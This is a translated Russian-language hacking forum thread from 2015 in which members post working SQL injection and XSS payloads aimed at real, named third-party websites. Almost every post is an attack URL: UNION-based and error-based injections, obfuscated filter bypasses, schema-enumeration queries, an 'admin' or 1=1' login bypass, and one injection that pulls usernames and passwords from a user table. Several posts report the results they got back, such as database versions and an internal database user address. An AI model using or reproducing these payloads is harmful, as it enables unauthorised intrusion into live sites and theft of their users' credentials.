SQLi, XSS and other vulnerabilities.

Discussion in 'Sandbox' started by Егорыч+++, 10 May 2015.

  1. Mister_Bert0ni

    Mister_Bert0ni Reservists Of Antichat

    Got it. Thanks for the guidance.
     
  2. BabaDook

    BabaDook Well-Known Member

    Found a few here, but I can't get anywhere with them. If anyone can tell me how to work ones like these, Monica herself will kiss them.
    PHP:
    http://amurchik.com.ua/catalog/dlya-nee/?block=1&filters=&sortBy=1


    http://www.eroticland.kh.ua/index.php?nav_id=1
     
  3. frank

    frank Level 8

    HTML:
    http://www.eroticland.kh.ua/index.php?nav_id=-1%27+and+456=78+union+select+1,2,3,version%28%29,5,6+--+
    5.1.73, output is in the title
     
  4. BabaDook

    BabaDook Well-Known Member

    PHP:
    http://sex.pics-land.ru/admin/
    HTML:
     login admin' or 1=1#
     
  5. R3hab

    R3hab Member

    PHP:
    http://www.futurefarmers.com/playshop/PJ1.php?id=-3%20union%20select%201,2,3,version(),5,6,7,8,9,10,11,12,13,14
    TIC 20, PR 5
    5.1.72-rel14.10
     
  6. frank

    frank Level 8

    I poked at the one that came first in your list, kept wanting to at least try to get some kind of XSS in there, but in the end nothing useful came of it :( All I managed was this, just for fun, or how to view blocked sites while bypassing the corporate proxy :)

    HTML:
    http://amurchik.com.ua/search/?q=%3Ciframe+src%3D%22http%3A%2F%2Fmicrosoft.com%22%3E%3C%2Fiframe%3E
     
  7. Filipp

    Filipp Member

  8. Babadyc

    Babadyc New Member

  9. Filipp

    Filipp Member

  10. BabaDook

    BabaDook Well-Known Member

    #50 BabaDook, 18 May 2015
    Last edited: 18 May 2015
  11. BabaDook

    BabaDook Well-Known Member

    PHP:
    http://itccst.ru/news_view.php?id=19'+and+false+/*!12345%55%6e%69%4f%4e*/+/*!12345%73%65%6c%65%63%74*/2,user(),3,database(),5+'1#
    HTML:
    http://www.matrot.ru/index.php?langue=2&page=M41H'+and+false+union+select 1,2,3,4,5/**/'1
    I can't quite figure out where the output is ((
    PHP:
    http://www.keramir-iv.ru/discr.php?id=3'+and+false+union+select 1,database(),3,4,4,4,4,4,5,5,6,7,8,7,7,6,5,4,4,7/**/'1#
    Is this one error-based?

    // can be worked both as error-based and as union
    PHP:
    http://diagnostika-plus.ru/index.php?page=dcatalog99'+%75%4e%49%4f%6e+%53%45%4c%65%63%74 1,2,database(),4,5/**/'1#
    PHP:
    http://www.spectehsnab.ru/index1.php?id=2+and+false+union+select+concat((select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.columns)where
    (table_schema!=0x696e666f726d6174696f6e5f736368656d61) and  (@a)in (@a:=concat(@a,0x3c6c693e,table_schema,
    0x203a3a20,table_name,0x203a3a20,column_name,0x3c62723e))))a))#
    PHP:
    http://www.limo-pro.ru/services.php?id=34+union+select 1,version(),{f database()},4,5,user(),7,8#
    Thanks to the guy for the article))

    Gentlemen, I'll merge these into one post later, don't be angry
     
    #51 BabaDook, 18 May 2015
    Last edited: 19 May 2015
  12. Mister_Bert0ni

    Mister_Bert0ni Reservists Of Antichat

    Code:
    http://bluegrassmidwest.com/details.php?id=.18%00' ++UNION+ALL+SELECT+1,concat(0x3c666f6e742073697a653d22352220636f6c6f723d2272656422203e7e7e496e6a6563746564204279204d69737465725f42657274306e697e7e3c68723e,0x4461746142617365203a3a,database(),0x3c62723e56457273696f4e203a3a,version(),
    0x3c62723e557365723a3a,user(),0x3c68723e3c2f666f6e743e,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)),3,4,5,6,7,8,9,10,11-- -
    
    
    
    
     
  13. tiger_x

    tiger_x New Member

    HTML:
    http://www.matrot.ru/index.php?action=search&Departement=0&langue=4&page=%27and%28select%201%20from%28select%20count%28*%29%2cconcat%28%28select%20concat%28version%28%29,user%28%29%29%20from%20information_schema.tables%20limit%200%2c1%29%2cfloor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29and%27
    This is error-based
     
  14. smirk

    smirk Elder

  15. nopony

    nopony New Member

    Code:
    http://www.unimarkt.at/filialen/detailinfo/?no_cache=1&single_uid=-1+UNION SELECT 1,2,3,4,5,6,7,8,(select password from fe_users limit 0,1),10,11,12,13,(select usergroup from fe_users limit 0,1),15,16,17,18,19,20,21,22,(select username from fe_users limit 0,1),24,25,26,27
     
  16. private_static

  17. R3hab

    R3hab Member

    #57 R3hab, 20 May 2015
    Last edited: 20 May 2015
  18. Bezlishke

    Bezlishke Member

    That wasn't the point of the question.


    Code:
    http://www.abrasifs-friess.com/produit.php?id=999.9+union+select+1,version%28%29+--+
    5.1.73-2+squeeze+build1+1-log
    abrasifsbase
    abrasifsbase@10.0.65.161
     
    #58 Bezlishke, 20 May 2015
    Last edited: 20 May 2015
  19. Cassie)

    Cassie) New Member

  20. Cassie)

    Cassie) New Member
